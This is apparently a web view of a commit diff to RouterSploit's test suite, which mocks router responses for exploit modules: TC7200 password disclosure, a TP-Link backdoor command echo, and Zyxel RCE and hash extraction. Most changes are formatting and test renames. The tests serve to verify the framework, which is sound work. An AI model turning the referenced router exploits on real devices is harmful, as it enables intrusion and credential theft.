AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAc3lzIGZlYXR1cmUgdHIwNjkgMQpzeXMgZXJyY3RsIDANCnN5cyB0cmNsIGxldmVsIDUNCnN5cyB0cmNsIHR5cGUgMTE4MA0Kc3lzIHRyY3AgY3IgNjQgOTYNCnN5cyB0cmNsIHN3IG9mZgpzeXMgdHJjcCBzdyBvZmYKaXAgdGNwIG1zcyA1MTINCmlwIHRjcCBsaW1pdCAyDQppcCB0Y3AgaXJ0dCA2NTAwMA0KaXAgdGNwIHdpbmRvdyAyDQppcCB0Y3AgY2VpbGluZyA2MDAwDQppcCByaXAgYWN0aXZhdGUNCmlwIHJpcCBtZXJnZSBvbg0KaXAgaWNtcCBkaXNjb3ZlcnkgZW5pZjAgb2ZmCnBwcCBpcGNwIGNvbXByZXNzIG9mZgpzeXMgd2RvZyBzdyBvbgpzeXMgcXVpY2sgZW5hYmxlCndhbiBhZHNsIHJhdGUgb2ZmCmYKZQp3YW4gYWRzbCByYXRlIG9mZgoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD//w=="
)
def
test_check_success
(
target
):
""" Test scenario - successful check """
...
...
tests/exploits/routers/technicolor/test_tc7200_password_disclosure_v2.py
View file @
62b83fb4
...
...
@@ -5,8 +5,11 @@ from routersploit.modules.exploits.routers.technicolor.tc7200_password_disclosur
def
test_check_success
(
target
):
""" Test scenario - successful exploitation """
encrypted_mock
=
binascii
.
unhexlify
(
'F29000B62A499FD0A9F39A6ADD2E7780'
# encrypted zero block + data from https://www.exploit-db.com/exploits/31894/
+
'c07fdfca294e1a4e4b74dbb2ffb7d2a73a90f00111134dc8d9810a90f2a9bf5862a179a20a9418a486bd4c8170730c8f'
)
encrypted_mock
=
binascii
.
unhexlify
(
"F29000B62A499FD0A9F39A6ADD2E7780"
# encrypted zero block + data from https://www.exploit-db.com/exploits/31894/
"c07fdfca294e1a4e4b74dbb2ffb7d2a73a90f00111134dc8d9810a90f2a9bf5862a179a20a9418a486bd4c8170730c8f"
)
route_mock
=
target
.
get_route_mock
(
"/goform/system/GatewaySettings.bin"
,
methods
=
[
"GET"
])
route_mock
.
return_value
=
(
encrypted_mock
...
...
tests/exploits/routers/thomson/test_twg850_password_disclosure.py
View file @
62b83fb4
tests/exploits/routers/tplink/test_wdr740nd_wdr740n_backdoor.py
View file @
62b83fb4
...
...
@@ -5,7 +5,7 @@ from routersploit.modules.exploits.routers.tplink.wdr740nd_wdr740n_backdoor impo
def
apply_response
(
*
args
,
**
kwargs
):
cmd
=
request
.
args
[
"cmd"
]
data
=
'TEST; var cmdResult = new Array(
\n
"'
+
cmd
+
'",
\n
0,0 ); TEST'
data
=
'TEST; var cmdResult = new Array(
\n
"'
+
cmd
+
'",
\n
0,0 ); TEST'
return
data
,
200
...
...
tests/exploits/routers/zyxel/test_d1000_rce.py
View file @
62b83fb4
tests/exploits/routers/zyxel/test_d1000_wifi_password_disclosure.py
View file @
62b83fb4
...
...
@@ -11,7 +11,6 @@ def test_check_success(target):
"TEST"
)
exploit
=
Exploit
()
exploit
.
target
=
target
.
host
exploit
.
port
=
target
.
port
...
...
tests/exploits/routers/zyxel/test_p660hn_t_v1_rce.py
View file @
62b83fb4
...
...
@@ -13,7 +13,6 @@ def test_check_success(mocked_shell, target):
"TEST"
)
exploit
=
Exploit
()
exploit
.
target
=
target
.
host
exploit
.
port
=
target
.
port
...
...
tests/exploits/routers/zyxel/test_p660hn_t_v2_rce.py
View file @
62b83fb4
...
...
@@ -13,7 +13,6 @@ def test_check_success(mocked_shell, target):
"TEST"
)
exploit
=
Exploit
()
exploit
.
target
=
target
.
host
exploit
.
port
=
target
.
port
...
...
tests/exploits/routers/zyxel/test_zywall_usg_extract_hashes.py
View file @
62b83fb4
...
...
@@ -11,7 +11,6 @@ def test_check_success(target):
"TEST
\n
"
)
exploit
=
Exploit
()
exploit
.
target
=
target
.
host
exploit
.
port
=
target
.
port
...
...
tests/test_exploit_scenarios.py
View file @
62b83fb4
...
...
@@ -33,7 +33,7 @@ def test_exploit_not_found_response(not_found_target, module):
@pytest.mark.parametrize
(
"module"
,
iter_modules
(
directory
))
def
test_exploit_e
mpty
_response
(
error_target
,
module
):
def
test_exploit_e
rror
_response
(
error_target
,
module
):
exploit
=
module
()
exploit
.
target
=
error_target
.
host
exploit
.
port
=
error_target
.
port
...
...
@@ -42,7 +42,7 @@ def test_exploit_empty_response(error_target, module):
@pytest.mark.parametrize
(
"module"
,
iter_modules
(
directory
))
def
test_exploit_
empty
_response
(
redirect_target
,
module
):
def
test_exploit_
redirect
_response
(
redirect_target
,
module
):
exploit
=
module
()
exploit
.
target
=
redirect_target
.
host
exploit
.
port
=
redirect_target
.
port
...
...
tests/test_module_info.py
View file @
62b83fb4
...
...
@@ -25,7 +25,7 @@ def test_exploit_info(exploit):
@pytest.mark.parametrize
(
"creds"
,
iter_modules
(
"./routersploit/modules/creds"
))
def
test_
exploit
_info
(
creds
):
def
test_
creds
_info
(
creds
):
info
=
creds
.
_Exploit__info__
assert
isinstance
(
info
,
dict
)
...
...
@@ -44,7 +44,7 @@ def test_exploit_info(creds):
@pytest.mark.parametrize
(
"scanner"
,
iter_modules
(
"./routersploit/modules/scanners"
))
def
test_
exploit
_info
(
scanner
):
def
test_
scanner
_info
(
scanner
):
info
=
scanner
.
_Exploit__info__
assert
isinstance
(
info
,
dict
)
...
...
Write
Preview
Markdown
is supported
0%
Try again
or
attach a new file
Attach a file
Cancel
You are about to add
0
people
to the discussion. Proceed with caution.
Finish editing this message first!
Cancel
Please
register
or
sign in
to comment